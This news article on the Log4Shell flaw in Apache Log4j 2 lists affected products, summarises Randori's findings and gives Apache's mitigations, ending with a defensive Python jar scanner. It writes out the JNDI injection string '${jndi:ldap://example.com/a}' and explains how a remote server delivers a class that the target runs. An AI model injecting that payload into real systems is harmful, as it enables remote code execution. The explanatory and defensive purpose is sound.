Log4Shell, a critical vulnerability in Apache Log4j 2 that affects many Java projects.

A short while ago we reported that a critical vulnerability had been identified in Apache Log4j 2, a popular framework for organizing logging in Java applications. It allows arbitrary code to be executed when a specially crafted value in the format `${jndi:URL}` is written to the log.

The vulnerability is notable because the attack can be carried out against Java applications that log values obtained from external sources, for example by echoing problematic values in error messages.

Almost all projects that use frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected, including Steam, Apple iCloud, and Minecraft clients and servers.

The vulnerability is expected to lead to a wave of massive attacks on enterprise applications, repeating the history of critical vulnerabilities in the Apache Struts framework, which by a rough estimate is used in 65% of the web applications of Fortune 100 companies. Attempts to scan the network for vulnerable systems have already been recorded.

The vulnerability allows unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.

The Randori attack team has developed a working exploit and has been able to successfully exploit this vulnerability in customer environments as part of our offensive security platform.

The vulnerability can be reached through a multitude of application-specific methods. In effect, any scenario in which a remote connection can supply arbitrary data that an application using the Log4j library writes to its log files is affected. This vulnerability is being actively exploited in the wild and may affect thousands of organizations. It represents a significant risk to affected systems.

The problem is compounded by the fact that a working exploit has already been published, while fixes for the stable branches have not yet been built. A CVE identifier has not yet been assigned. The fix is so far only included in the log4j-2.15.0-rc1 test branch. As a workaround to block the vulnerability, it is recommended to set the Log4j2.formatMsgNoLookups parameter to true.

The problem is caused by Log4j 2's support for the special "{}" masks in log lines, inside which JNDI (Java Naming and Directory Interface) queries can be executed.

In its analysis of CVE-2021-44228, Randori concluded the following:

Default installations of widely used enterprise software are vulnerable.
The vulnerability can be exploited reliably and without authentication.
The vulnerability affects multiple versions of Log4j 2.
The vulnerability allows remote code execution as the user running the application that uses the library.

The attack boils down to passing a string containing the substitution "${jndi:ldap://example.com/a}"; while processing it, Log4j 2 sends an LDAP request to the attacker.com server asking for the path to a Java class. The path returned by the attacker's server (for example, http://example.com/Exploit.class) is then loaded and executed in the context of the current process, giving the attacker code execution on the system with the privileges of the running application.

Finally, it is noted that if anomalies are found, you should assume this is an active incident, that the system has been compromised, and respond accordingly. Upgrading to patched versions of Log4j 2 or of the affected applications eliminates this vulnerability. Randori recommends that any organization that believes it may be affected upgrade to a patched version urgently.

In the latest update from the Apache Log4j team, organizations are advised to do the following:

  • Upgrade to Log4j 2.15.0
  • For those who cannot upgrade to 2.15.0: in versions >= 2.10, this vulnerability can be mitigated by setting the log4j2.formatMsgNoLookups system property or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.
  • For versions 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
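To confirm that the mitigations above have actually landed on a host, here is an added Python check (not code from this article or from the Log4j project). It opens each log4j-core jar, reads the version from the manifest's Implementation-Version attribute, and reports whether JndiLookup.class is still present; the in-memory sample jars are constructed only for illustration.

```python
import io
import re
import zipfile
from pathlib import Path

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 15, 0, 1)  # the 2.15.0 release; pre-release tags sort below it


def parse_version(text):
    """Map '2.14.1' or '2.0-beta9' to a comparable tuple (pre-release tags sort lower)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(\w+))?", text or "")
    if not m:
        return None
    major, minor, patch, tag = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if tag else 1)


def check_jar(jar_source):
    """Inspect one log4j-core jar (path or file-like) for the JndiLookup class and its version."""
    with zipfile.ZipFile(jar_source) as jar:
        names = jar.namelist()
        has_lookup = JNDI_LOOKUP in names
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            version = m.group(1) if m else None
    parsed = parse_version(version)
    # Exposed when the lookup class is still present and the version predates the fix;
    # an unreadable version is treated as outdated so the jar gets a manual look.
    vulnerable = has_lookup and (parsed is None or parsed < FIXED)
    return {"version": version, "has_jndi_lookup": has_lookup, "vulnerable": vulnerable}


def scan(root):
    """Check every log4j-core-*.jar found under a directory tree."""
    return {str(p): check_jar(p) for p in Path(root).rglob("log4j-core-*.jar")}


def build_sample_jar(version, include_lookup):
    """Constructed in-memory jar standing in for a real log4j-core build (fixture, not real data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_lookup:
            jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic bytes only
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for ver, lookup in [("2.14.1", True), ("2.14.1", False), ("2.15.0", True)]:
        print(ver, "class present" if lookup else "class removed", check_jar(build_sample_jar(ver, lookup)))
```

Run `scan("/opt/myapp")` against a real deployment to list every jar that still needs the upgrade or the class removal.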

Source: https://www.lunasec.io/

